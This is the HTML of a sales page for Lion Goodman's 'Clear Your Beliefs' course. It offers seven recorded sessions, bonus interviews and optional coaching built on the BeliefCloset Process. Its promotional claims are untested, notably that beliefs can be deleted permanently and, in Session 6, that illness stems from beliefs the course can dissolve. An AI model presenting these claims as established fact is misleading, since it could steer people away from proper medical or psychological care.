<em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" 